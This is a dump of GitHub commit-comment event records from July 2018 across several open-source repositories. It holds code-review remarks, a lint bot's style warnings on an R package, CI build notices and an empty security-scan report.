{"id":"8036573020","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":29884022,"position":81,"line":2595,"path":"src/etc/inc/interfaces.inc","commit_id":"eb1e3966e5ecb9c7f7245c61e7155fee892648a5","created_at":"2018-07-30T09:34:43Z","updated_at":"2018-07-30T09:34:43Z","author_association":"MEMBER","body":"@marjohn56 wild guess for #2585 if you talk about 18.7 or development version, not 18.1"}},"created_at":"2018-07-30T09:34:43Z"}
{"id":"8036573430","type":"CommitCommentEvent","actor":{"login":"msalle"},"repo":{"name":"daserzw/oidc-edu-wg"},"payload":{"comment":{"id":29884023,"position":13,"line":26,"path":"charter.md","commit_id":"04846d0de5756cd22341141de58484c2553a99fa","created_at":"2018-07-30T09:34:48Z","updated_at":"2018-07-30T09:34:48Z","author_association":"NONE","body":"Something is missing here...?"}},"created_at":"2018-07-30T09:34:48Z"}
{"id":"8036573752","type":"CommitCommentEvent","actor":{"login":"elevinskii"},"repo":{"name":"elevinskii/magento2-theme-deepfish"},"payload":{"comment":{"id":29884024,"position":10,"line":12,"path":"app/design/frontend/IdealCode/DeepFish/Magento_Search/layout/default.xml","commit_id":"0fde2002057fbd5e88782042a987f471e2e0f3a6","created_at":"2018-07-30T09:34:52Z","updated_at":"2018-07-30T09:34:52Z","author_association":"OWNER","body":"Need unique value"}},"created_at":"2018-07-30T09:34:52Z"}
{"id":"8036575193","type":"CommitCommentEvent","actor":{"login":"gwen-soleil"},"repo":{"name":"tango-controls/JTango"},"payload":{"comment":{"id":29884028,"position":null,"line":null,"path":null,"commit_id":"7221a91c3a6a737b3c5ac78f5dafa1416b1a9784","created_at":"2018-07-30T09:35:10Z","updated_at":"2018-07-30T09:35:10Z","author_association":"COLLABORATOR","body":"Unfortunately, it is impossible because it is used elsewhere at SOLEIL. I have to maintain backward compatibility. A smoother option is to use @deprecated"}},"created_at":"2018-07-30T09:35:10Z"}
{"id":"8036579529","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"inbo/LSVI"},"payload":{"comment":{"id":29884036,"position":null,"line":null,"path":null,"commit_id":"55ace87a2ba88f2c9fad758fe1e273b0c78f95c4","created_at":"2018-07-30T09:36:00Z","updated_at":"2018-07-30T09:36:00Z","author_association":"NONE","body":"[R/berekenLSVIbasis.R:172:1:](https://github.com/inbo/LSVI/blob/55ace87a2ba88f2c9fad758fe1e273b0c78f95c4/R/berekenLSVIbasis.R#L172) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>        by = c(\"ID\", \"Criterium\", \"Indicator\", \"Voorwaarde.lower\" = \"Voorwaarde\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/combinerenVerschilscore.R:35:6:](https://github.com/inbo/LSVI/blob/55ace87a2ba88f2c9fad758fe1e273b0c78f95c4/R/combinerenVerschilscore.R#L35) *warning:* **local variable '%max%' assigned but may not be used**\n```r\n<U+200B>    `%max%` <- function(a, b) max(a, b)\n     ^~~~~\n```\n[R/combinerenVerschilscore.R:36:6:](https://github.com/inbo/LSVI/blob/55ace87a2ba88f2c9fad758fe1e273b0c78f95c4/R/combinerenVerschilscore.R#L36) *warning:* **local variable '%min%' assigned but may not be used**\n```r\n<U+200B>    `%min%` <- function(a, b) min(a, b)\n     ^~~~~\n```\n[R/combinerenVoorwaarden.R:31:1:](https://github.com/inbo/LSVI/blob/55ace87a2ba88f2c9fad758fe1e273b0c78f95c4/R/combinerenVoorwaarden.R#L31) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog testen of Formule bestaat uit EN, OF, haakjes en VoorwaardeID's (en evt. andere tekens die logische berekening toelaten)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/deselecteerKenmerkenInOpname.R:45:1:](https://github.com/inbo/LSVI/blob/55ace87a2ba88f2c9fad758fe1e273b0c78f95c4/R/deselecteerKenmerkenInOpname.R#L45) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>      #Hier moet nog toegevoegd worden dat ofwel de soorten, ofwel de subsoorten gewist moeten worden al naargelang de soorten zelf in de kenmerkenlijst staan (zie berekenAantalSoorten en selecteerSoortenInOpname)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_soortenKenmerken.R:119:1:](https://github.com/inbo/LSVI/blob/55ace87a2ba88f2c9fad758fe1e273b0c78f95c4/R/invoercontroleData_soortenKenmerken.R#L119) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    Kenmerken <- Data_soortenKenmerken #naamsverandering is omdat code verplaatst is\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_voorwaarden.R:44:11:](https://github.com/inbo/LSVI/blob/55ace87a2ba88f2c9fad758fe1e273b0c78f95c4/R/invoercontroleData_voorwaarden.R#L44) *warning:* **local variable 'z' assigned but may not be used**\n```r\n<U+200B>          z <- tolower(x)\n          ^\n```\n[R/invoercontroleData_voorwaarden.R:62:1:](https://github.com/inbo/LSVI/blob/55ace87a2ba88f2c9fad758fe1e273b0c78f95c4/R/invoercontroleData_voorwaarden.R#L62) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #misschien best ook testen dat die indicator-criterium-combinatie in de databank voorkomt?  En of deze voor dat habitattype voorkomt, maar dat best verderop doen\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_voorwaarden.R:63:1:](https://github.com/inbo/LSVI/blob/55ace87a2ba88f2c9fad758fe1e273b0c78f95c4/R/invoercontroleData_voorwaarden.R#L63) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #Voorwaarde ook verplichten?  Anders wel testen of het ok is als het aanwezig is.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:40:13:](https://github.com/inbo/LSVI/blob/55ace87a2ba88f2c9fad758fe1e273b0c78f95c4/R/s4_bedekking.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:43:1:](https://github.com/inbo/LSVI/blob/55ace87a2ba88f2c9fad758fe1e273b0c78f95c4/R/s4_bedekking.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:59:7:](https://github.com/inbo/LSVI/blob/55ace87a2ba88f2c9fad758fe1e273b0c78f95c4/R/s4_bedekking.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:60:7:](https://github.com/inbo/LSVI/blob/55ace87a2ba88f2c9fad758fe1e273b0c78f95c4/R/s4_bedekking.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:40:13:](https://github.com/inbo/LSVI/blob/55ace87a2ba88f2c9fad758fe1e273b0c78f95c4/R/s4_maxBedekking.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:43:1:](https://github.com/inbo/LSVI/blob/55ace87a2ba88f2c9fad758fe1e273b0c78f95c4/R/s4_maxBedekking.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:59:7:](https://github.com/inbo/LSVI/blob/55ace87a2ba88f2c9fad758fe1e273b0c78f95c4/R/s4_maxBedekking.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:60:7:](https://github.com/inbo/LSVI/blob/55ace87a2ba88f2c9fad758fe1e273b0c78f95c4/R/s4_maxBedekking.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:40:13:](https://github.com/inbo/LSVI/blob/55ace87a2ba88f2c9fad758fe1e273b0c78f95c4/R/s4_maxBedekkingExcl.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:43:1:](https://github.com/inbo/LSVI/blob/55ace87a2ba88f2c9fad758fe1e273b0c78f95c4/R/s4_maxBedekkingExcl.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:59:7:](https://github.com/inbo/LSVI/blob/55ace87a2ba88f2c9fad758fe1e273b0c78f95c4/R/s4_maxBedekkingExcl.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:60:7:](https://github.com/inbo/LSVI/blob/55ace87a2ba88f2c9fad758fe1e273b0c78f95c4/R/s4_maxBedekkingExcl.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/selecteerKenmerkenInOpname.R:55:1:](https://github.com/inbo/LSVI/blob/55ace87a2ba88f2c9fad758fe1e273b0c78f95c4/R/selecteerKenmerkenInOpname.R#L55) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>      #Hier moet nog toegevoegd worden dat ofwel de soorten, ofwel de subsoorten gewist moeten worden al naargelang de soorten zelf in de kenmerkenlijst staan (zie berekenAantalSoorten en selecteerSoortenInOpname)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/zzz.R:31:13:](https://github.com/inbo/LSVI/blob/55ace87a2ba88f2c9fad758fe1e273b0c78f95c4/R/zzz.R#L31) *warning:* **no visible binding for global variable 'ConnectiePool'**\n```r\n<U+200B>  poolClose(ConnectiePool)\n            ^~~~~~~~~~~~~\n```\n[inst/tests/testthat/helper_all_equal_tibbles.R:1:1:](https://github.com/inbo/LSVI/blob/55ace87a2ba88f2c9fad758fe1e273b0c78f95c4/inst/tests/testthat/helper_all_equal_tibbles.R#L1) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n<U+200B>all.equal.tbl_df <- function(target, current, ...) {\n^~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_1_databank.R:38:15:](https://github.com/inbo/LSVI/blob/55ace87a2ba88f2c9fad758fe1e273b0c78f95c4/inst/tests/testthat/test_1_databank.R#L38) *style:* **Trailing whitespace is superfluous.**\n```r\n<U+200B>        ) %in% \n              ^\n```\n[inst/tests/testthat/test_1_databank.R:475:1:](https://github.com/inbo/LSVI/blob/55ace87a2ba88f2c9fad758fe1e273b0c78f95c4/inst/tests/testthat/test_1_databank.R#L475) *style:* **Trailing blank lines are superfluous.**\n```r\n<U+200B>\n^\n```\n[inst/tests/testthat/test_1_databank.R:476:1:](https://github.com/inbo/LSVI/blob/55ace87a2ba88f2c9fad758fe1e273b0c78f95c4/inst/tests/testthat/test_1_databank.R#L476) *style:* **Trailing blank lines are superfluous.**\n```r\n<U+200B>\n^\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:26:3:](https://github.com/inbo/LSVI/blob/55ace87a2ba88f2c9fad758fe1e273b0c78f95c4/inst/tests/testthat/test_berekenLSVIbasis.R#L26) *style:* **Commented code should be removed.**\n```r\n<U+200B># save(Resultaat, file = \"inst/vbdata/Resultaat_test.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:27:3:](https://github.com/inbo/LSVI/blob/55ace87a2ba88f2c9fad758fe1e273b0c78f95c4/inst/tests/testthat/test_berekenLSVIbasis.R#L27) *style:* **Commented code should be removed.**\n```r\n<U+200B># load(\"inst/vbdata/Resultaat_test.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:555:1:](https://github.com/inbo/LSVI/blob/55ace87a2ba88f2c9fad758fe1e273b0c78f95c4/inst/tests/testthat/test_berekenLSVIbasis.R#L555) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog testen: \"Niet alle te evalueren soorten zijn opgenomen onder Data_soorten\\\\$Soort_Latijn, er wordt van uitgegaan dat de niet opgenomen soorten niet waargenomen zijn\"\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:556:1:](https://github.com/inbo/LSVI/blob/55ace87a2ba88f2c9fad758fe1e273b0c78f95c4/inst/tests/testthat/test_berekenLSVIbasis.R#L556) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog extra tests toevoegen voor genera en habitatsubtypes als de ontwikkeling hiervoor op punt staat\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R:21:1:](https://github.com/inbo/LSVI/blob/55ace87a2ba88f2c9fad758fe1e273b0c78f95c4/inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R#L21) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>  mutate(  #idee is om onderstaande code te wissen zodra de rekenmodule hiervoor aangepast is\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R:55:3:](https://github.com/inbo/LSVI/blob/55ace87a2ba88f2c9fad758fe1e273b0c78f95c4/inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R#L55) *style:* **Commented code should be removed.**\n```r\n<U+200B># save(Resultaat, file = \"inst/vbdata/Resultaat_test_bos.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R:56:3:](https://github.com/inbo/LSVI/blob/55ace87a2ba88f2c9fad758fe1e273b0c78f95c4/inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R#L56) *style:* **Commented code should be removed.**\n```r\n<U+200B># load(\"inst/vbdata/Resultaat_test_bos.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R:66:55:](https://github.com/inbo/LSVI/blob/55ace87a2ba88f2c9fad758fe1e273b0c78f95c4/inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R#L66) *style:* **Trailing whitespace is superfluous.**\n```r\n<U+200B>          Versie = \"Versie 3\", Kwaliteitsniveau = \"1\", \n                                                      ^\n```\n[inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R:76:55:](https://github.com/inbo/LSVI/blob/55ace87a2ba88f2c9fad758fe1e273b0c78f95c4/inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R#L76) *style:* **Trailing whitespace is superfluous.**\n```r\n<U+200B>          Versie = \"Versie 3\", Kwaliteitsniveau = \"1\", \n                                                      ^\n```\n[inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R:95:57:](https://github.com/inbo/LSVI/blob/55ace87a2ba88f2c9fad758fe1e273b0c78f95c4/inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R#L95) *style:* **Trailing whitespace is superfluous.**\n```r\n<U+200B>            Versie = \"Versie 3\", Kwaliteitsniveau = \"1\", \n                                                        ^\n```\n[inst/tests/testthat/test_s4_Aantal.R:189:1:](https://github.com/inbo/LSVI/blob/55ace87a2ba88f2c9fad758fe1e273b0c78f95c4/inst/tests/testthat/test_s4_Aantal.R#L189) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>  #nog toevoegen als het opzoeken van soorten in subniveaus opgelost is: de aggregatie van bedekkingen gebeurt correct\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-30T09:36:00Z"}
{"id":"8036581039","type":"CommitCommentEvent","actor":{"login":"velurimithun"},"repo":{"name":"jlHertel/adriconf"},"payload":{"comment":{"id":29884039,"position":null,"line":null,"path":null,"commit_id":"daa5310038ee6290c549b89ec766f8b0cb575491","created_at":"2018-07-30T09:36:17Z","updated_at":"2018-07-30T09:36:17Z","author_association":"CONTRIBUTOR","body":"Pl. let me know it is okay or not? if we handle the error this way?"}},"created_at":"2018-07-30T09:36:17Z"}
{"id":"8036589758","type":"CommitCommentEvent","actor":{"login":"Corprey"},"repo":{"name":"Corprey/Diplomarbeit"},"payload":{"comment":{"id":29884057,"position":null,"line":null,"path":null,"commit_id":"bed6e4043ed945153355283ec95fe864c2ca3ab1","created_at":"2018-07-30T09:37:57Z","updated_at":"2018-07-30T09:37:57Z","author_association":"OWNER","body":"added toolbar class"}},"created_at":"2018-07-30T09:37:57Z"}
{"id":"8036589854","type":"CommitCommentEvent","actor":{"login":"gwen-soleil"},"repo":{"name":"tango-controls/JTango"},"payload":{"comment":{"id":29884058,"position":5,"line":35,"path":"server/src/main/resources/logback.xml","commit_id":"51514e9fc95200d38e74b3228d8725aba38a0cc3","created_at":"2018-07-30T09:37:58Z","updated_at":"2018-07-30T09:37:58Z","author_association":"COLLABORATOR","body":"Yes!"}},"created_at":"2018-07-30T09:37:58Z"}
{"id":"8036590661","type":"CommitCommentEvent","actor":{"login":"elevinskii"},"repo":{"name":"elevinskii/magento2-theme-deepfish"},"payload":{"comment":{"id":29884061,"position":19,"line":21,"path":"app/design/frontend/IdealCode/DeepFish/Magento_Search/layout/default.xml","commit_id":"0fde2002057fbd5e88782042a987f471e2e0f3a6","created_at":"2018-07-30T09:38:08Z","updated_at":"2018-07-30T09:38:08Z","author_association":"OWNER","body":"Check max line length"}},"created_at":"2018-07-30T09:38:08Z"}
{"id":"8036590735","type":"CommitCommentEvent","actor":{"login":"JC-Devcore"},"repo":{"name":"JC-Devcore/Hello-World"},"payload":{"comment":{"id":29884062,"position":3,"line":1,"path":"README.md","commit_id":"58025425bfb63afc920e9992dae9bfefcd025e62","created_at":"2018-07-30T09:38:09Z","updated_at":"2018-07-30T09:38:09Z","author_association":"OWNER","body":"Use in branch"}},"created_at":"2018-07-30T09:38:09Z"}
{"id":"8036596993","type":"CommitCommentEvent","actor":{"login":"KlepaczPrzemyslaw"},"repo":{"name":"KlepaczPrzemyslaw/Phone-Book"},"payload":{"comment":{"id":29884073,"position":null,"line":null,"path":null,"commit_id":"8006e7afaae243e5ebcf6b274c7a6e3bb95e576f","created_at":"2018-07-30T09:39:21Z","updated_at":"2018-07-30T09:39:21Z","author_association":"OWNER","body":"@pwasilewski-netcode\r\nGotowe zadanie z warsztatów. Tydzień trzeci."}},"created_at":"2018-07-30T09:39:21Z"}
{"id":"8036597902","type":"CommitCommentEvent","actor":{"login":"jxon"},"repo":{"name":"wwqgtxx/wwqLyParse"},"payload":{"comment":{"id":29884079,"position":40,"line":107,"path":"wwqLyParse/parsers/iqiyimtsparser.py","commit_id":"f743823d3673e14f86da1839dad3e027d1e81f9f","created_at":"2018-07-30T09:39:31Z","updated_at":"2018-07-30T09:39:31Z","author_association":"NONE","body":"这里应该是 `title = match1(html, '<title>([^<]+)').split('-')[0]`"}},"created_at":"2018-07-30T09:39:31Z"}
{"id":"8036602719","type":"CommitCommentEvent","actor":{"login":"Sollace"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29884092,"position":93,"line":83,"path":"src/main/java/com/minelittlepony/render/ponies/MobRenderers.java","commit_id":"668d7ff6e025f60f6f2e81faf0957e5f36d794f0","created_at":"2018-07-30T09:40:27Z","updated_at":"2018-07-30T09:40:27Z","author_association":"MEMBER","body":"I've had an idea where we xan rewrite this and mot have to do _either_."}},"created_at":"2018-07-30T09:40:27Z"}
{"id":"8036603111","type":"CommitCommentEvent","actor":{"login":"jxon"},"repo":{"name":"wwqgtxx/wwqLyParse"},"payload":{"comment":{"id":29884093,"position":26,"line":93,"path":"wwqLyParse/parsers/iqiyimtsparser.py","commit_id":"f743823d3673e14f86da1839dad3e027d1e81f9f","created_at":"2018-07-30T09:40:32Z","updated_at":"2018-07-30T09:40:32Z","author_association":"NONE","body":"这里应该是`title = video_info['name']`，和下面的title弄反了"}},"created_at":"2018-07-30T09:40:32Z"}
{"id":"8036604125","type":"CommitCommentEvent","actor":{"login":"checkmarxQA"},"repo":{"name":"checkmarxQA/CxRepository"},"payload":{"comment":{"id":29884099,"position":null,"line":null,"path":null,"commit_id":"a23cad998261c81bf63aa21ac681a2e8b5303e7c","created_at":"2018-07-30T09:40:44Z","updated_at":"2018-07-30T09:40:44Z","author_association":"OWNER","body":"Checkmarx scan results 30 Jul 2018 12:40 UTC +03:00\r\n<table>\r\n<thead>\r\n<tr>\r\n<th></th>\r\n<th>High</th>\r\n<th>Medium</th>\r\n<th>Low</th>\r\n<th>Info</th>\r\n</tr>\r\n</thead>\r\n<tbody>\r\n<tr>\r\n<td><b>New</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n<tr>\r\n<td><b>Recurrent</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n<tr>\r\n<td><b>Fixed</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href= \"http://2016CITEMPLATE/CxWebClient/ViewerMain.aspx?scanid=1010011&projectid=10012\"> Open Viewer</a>\r\n<b>Included commits</b><table><tr><th>Commit ID</th><th>Owner</th></tr><tr><td><a href=\"https://github.com/checkmarxQA/CxRepository/commit/a23cad998261c81bf63aa21ac681a2e8b5303e7c\">a23cad998261c81bf63aa21ac681a2e8b5303e7c</a></td><td>@web-flow</td></tr></table>\r\n"}},"created_at":"2018-07-30T09:40:44Z"}
{"id":"8036606951","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29884105,"position":null,"line":null,"path":null,"commit_id":"7ee9b53d0800cecbef7bf1546468d4839f568e30","created_at":"2018-07-30T09:41:17Z","updated_at":"2018-07-30T09:41:17Z","author_association":"COLLABORATOR","body":"TeamCity Solution Engineering / Packer Templates [Build 563](https://ci.hashicorp.engineering/viewLog.html?buildId=107575&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-30T09:41:17Z"}
{"id":"8036608519","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29884107,"position":null,"line":null,"path":null,"commit_id":"7ee9b53d0800cecbef7bf1546468d4839f568e30","created_at":"2018-07-30T09:41:35Z","updated_at":"2018-07-30T09:41:35Z","author_association":"COLLABORATOR","body":"TeamCity Solution Engineering / Packer Templates [Build 563](https://ci.hashicorp.engineering/viewLog.html?buildId=107575&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:18"}},"created_at":"2018-07-30T09:41:35Z"}
{"id":"8036608538","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29884108,"position":null,"line":null,"path":null,"commit_id":"7ee9b53d0800cecbef7bf1546468d4839f568e30","created_at":"2018-07-30T09:41:35Z","updated_at":"2018-07-30T09:41:35Z","author_association":"COLLABORATOR","body":"TeamCity Solution Engineering / Packer Templates [Build 564](https://ci.hashicorp.engineering/viewLog.html?buildId=107576&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-30T09:41:35Z"}
{"id":"8036609743","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29884111,"position":null,"line":null,"path":null,"commit_id":"7ee9b53d0800cecbef7bf1546468d4839f568e30","created_at":"2018-07-30T09:41:50Z","updated_at":"2018-07-30T09:41:50Z","author_association":"COLLABORATOR","body":"TeamCity Solution Engineering / Packer Templates [Build 564](https://ci.hashicorp.engineering/viewLog.html?buildId=107576&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:14"}},"created_at":"2018-07-30T09:41:50Z"}
{"id":"8036609806","type":"CommitCommentEvent","actor":{"login":"ktisha"},"repo":{"name":"phoenix-asv/edu-server"},"payload":{"comment":{"id":29884114,"position":23,"line":23,"path":"edu_server/edu_server/settings.py","commit_id":"8ff20bd6be2c554c4c8f3fcd63a09ab0d7df9e5f","created_at":"2018-07-30T09:41:50Z","updated_at":"2018-07-30T09:41:50Z","author_association":"COLLABORATOR","body":"Not a good idea to store secret key in public repository."}},"created_at":"2018-07-30T09:41:50Z"}
{"id":"8036611591","type":"CommitCommentEvent","actor":{"login":"volkertb"},"repo":{"name":"Extravert-ir/reactos"},"payload":{"comment":{"id":29884118,"position":7,"line":189,"path":"boot/freeldr/bootsect/btrfs.S","commit_id":"8ae62c1bbcbd8eae15911a17193d64bca1cae950","created_at":"2018-07-30T09:42:12Z","updated_at":"2018-07-30T09:42:12Z","author_association":"NONE","body":"@Extravert-ir First of all, nice work! 😃\r\n\r\nIn [your corresponding blog post](https://reactos.org/blogs/gsoc-2018-booting-btrfs-works), you mentioned that this was \"a bug in VirtualBox BIOS implementation\". In case you haven't yet done so, perhaps you can report this VirtualBox bug upstream, so that they can improve it, even though your ReactOS code now has a workaround for it? See the links below.\r\n\r\n* https://www.virtualbox.org/wiki/Bugtracker\r\n* https://www.virtualbox.org/newticket\r\n\r\nThanks again!\r\n"}},"created_at":"2018-07-30T09:42:12Z"}
